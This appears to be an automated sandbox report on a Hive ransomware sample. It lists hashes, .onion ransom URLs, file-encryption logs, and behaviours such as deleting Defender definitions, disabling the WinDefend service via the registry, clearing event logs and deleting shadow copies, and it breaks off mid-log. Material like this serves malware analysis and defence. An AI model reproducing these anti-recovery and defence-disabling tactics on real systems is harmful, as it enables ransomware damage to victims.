Analysis
-
max time kernel
129s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-01-2022 12:00
Static task
static1
Behavioral task
behavioral1
Sample
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
Resource
win10v2004-en-20220113
General
-
Target
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
-
Size
4.2MB
-
MD5
4685e7981959356439fe0f5643d45450
-
SHA1
88b7ef25b17528a464758aafa9e853477e391491
-
SHA256
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8
-
SHA512
8aefb153e913544d1e83b98cc964f266e537bd962c44dc2142f33a4ddf356230bc2b10d713fa84c77a33a2a8003cf1ab143f44dee227d7832f5cbd516f94b56f
Malware Config
Extracted
C:\Program Files\7-Zip\mSnL_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2152 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2092 bcdedit.exe 2112 bcdedit.exe -
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ExitOut.raw => C:\Users\Admin\Pictures\ExitOut.raw.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\InstallTrace.tif => C:\Users\Admin\Pictures\InstallTrace.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\PingBlock.png.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\ResetDismount.tiff => C:\Users\Admin\Pictures\ResetDismount.tiff.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\ResetDismount.tiff.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\SwitchBlock.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\UseLimit.tiff.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\NewEnable.png => C:\Users\Admin\Pictures\NewEnable.png.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\NewEnable.png.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\UseLimit.tiff => C:\Users\Admin\Pictures\UseLimit.tiff.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\ExitOut.raw.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\PingBlock.png => C:\Users\Admin\Pictures\PingBlock.png.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\RenameClear.tif => C:\Users\Admin\Pictures\RenameClear.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\RenameClear.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File renamed C:\Users\Admin\Pictures\SwitchBlock.tif => C:\Users\Admin\Pictures\SwitchBlock.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Users\Admin\Pictures\InstallTrace.tif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Windows Sidebar\en-US\Sidebar.exe.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01044_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\navBack.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_OFF.GIF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\settings.html 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALENDAR.DPV.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE.HXS.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14756_.GIF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICTPH.POC.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02862_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18219_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVELOPE.DPV.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\mSnL_HOW_TO_DECRYPT.txt 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106124.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\mSnL_HOW_TO_DECRYPT.txt 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\COMPASS.ELM.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssui.dll.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149887.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\Office64MUI.XML.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00530_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay.css.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_IAAAACAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\RSSFeeds.html 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01186_.WMF.ZgVaVEXqHelXqzD4tpQup0Aj7h6G7tPu0NCBHcn1GiP_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1732 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2620 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2652 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2184 powershell.exe 2272 powershell.exe 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1748 wevtutil.exe Token: SeBackupPrivilege 1748 wevtutil.exe Token: SeSecurityPrivilege 888 wevtutil.exe Token: SeBackupPrivilege 888 wevtutil.exe Token: SeSecurityPrivilege 1752 wevtutil.exe Token: SeBackupPrivilege 1752 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1168 wmic.exe Token: SeSecurityPrivilege 1168 wmic.exe Token: SeTakeOwnershipPrivilege 1168 wmic.exe Token: SeLoadDriverPrivilege 1168 wmic.exe Token: SeSystemProfilePrivilege 1168 wmic.exe Token: SeSystemtimePrivilege 1168 wmic.exe Token: SeProfSingleProcessPrivilege 1168 wmic.exe Token: SeIncBasePriorityPrivilege 1168 wmic.exe Token: SeCreatePagefilePrivilege 1168 wmic.exe Token: SeBackupPrivilege 1168 wmic.exe Token: SeRestorePrivilege 1168 wmic.exe Token: SeShutdownPrivilege 1168 wmic.exe Token: SeDebugPrivilege 1168 wmic.exe Token: SeSystemEnvironmentPrivilege 1168 wmic.exe Token: SeRemoteShutdownPrivilege 1168 wmic.exe Token: SeUndockPrivilege 1168 wmic.exe Token: SeManageVolumePrivilege 1168 wmic.exe Token: 33 1168 wmic.exe Token: 34 1168 wmic.exe Token: 35 1168 wmic.exe Token: SeIncreaseQuotaPrivilege 1908 wmic.exe Token: SeSecurityPrivilege 1908 wmic.exe Token: SeTakeOwnershipPrivilege 1908 wmic.exe Token: SeLoadDriverPrivilege 1908 wmic.exe Token: SeSystemProfilePrivilege 1908 wmic.exe Token: SeSystemtimePrivilege 1908 wmic.exe Token: SeProfSingleProcessPrivilege 1908 wmic.exe Token: SeIncBasePriorityPrivilege 1908 wmic.exe Token: SeCreatePagefilePrivilege 1908 wmic.exe Token: SeBackupPrivilege 1908 wmic.exe Token: SeRestorePrivilege 1908 wmic.exe Token: SeShutdownPrivilege 1908 wmic.exe Token: SeDebugPrivilege 1908 wmic.exe Token: SeSystemEnvironmentPrivilege 1908 wmic.exe Token: SeRemoteShutdownPrivilege 1908 wmic.exe Token: SeUndockPrivilege 1908 wmic.exe Token: SeManageVolumePrivilege 1908 wmic.exe Token: 33 1908 wmic.exe Token: 34 1908 wmic.exe Token: 35 1908 wmic.exe Token: SeIncreaseQuotaPrivilege 1908 wmic.exe Token: SeSecurityPrivilege 1908 wmic.exe Token: SeTakeOwnershipPrivilege 1908 wmic.exe Token: SeLoadDriverPrivilege 1908 wmic.exe Token: SeSystemProfilePrivilege 1908 wmic.exe Token: SeSystemtimePrivilege 1908 wmic.exe Token: SeProfSingleProcessPrivilege 1908 wmic.exe Token: SeIncBasePriorityPrivilege 1908 wmic.exe Token: SeCreatePagefilePrivilege 1908 wmic.exe Token: SeBackupPrivilege 1908 wmic.exe Token: SeRestorePrivilege 1908 wmic.exe Token: SeShutdownPrivilege 1908 wmic.exe Token: SeDebugPrivilege 1908 wmic.exe Token: SeSystemEnvironmentPrivilege 1908 wmic.exe Token: SeRemoteShutdownPrivilege 1908 wmic.exe Token: SeUndockPrivilege 1908 wmic.exe Token: SeManageVolumePrivilege 1908 wmic.exe Token: 33 1908 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1464 wrote to memory of 268 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 28 PID 1464 wrote to memory of 268 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 28 PID 1464 wrote to memory of 268 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 28 PID 268 wrote to memory of 996 268 net.exe 30 PID 268 wrote to memory of 996 268 net.exe 30 PID 268 wrote to memory of 996 268 net.exe 30 PID 1464 wrote to memory of 576 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 31 PID 1464 wrote to memory of 576 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 31 PID 1464 wrote to memory of 576 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 31 PID 576 wrote to memory of 1628 576 net.exe 33 PID 576 wrote to memory of 1628 576 net.exe 33 PID 576 wrote to memory of 1628 576 net.exe 33 PID 1464 wrote to memory of 1356 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 34 PID 1464 wrote to memory of 1356 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 34 PID 1464 wrote to memory of 1356 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 34 PID 1356 wrote to memory of 820 1356 net.exe 36 PID 1356 wrote to memory of 820 1356 net.exe 36 PID 1356 wrote to memory of 820 1356 net.exe 36 PID 1464 wrote to memory of 1412 1464 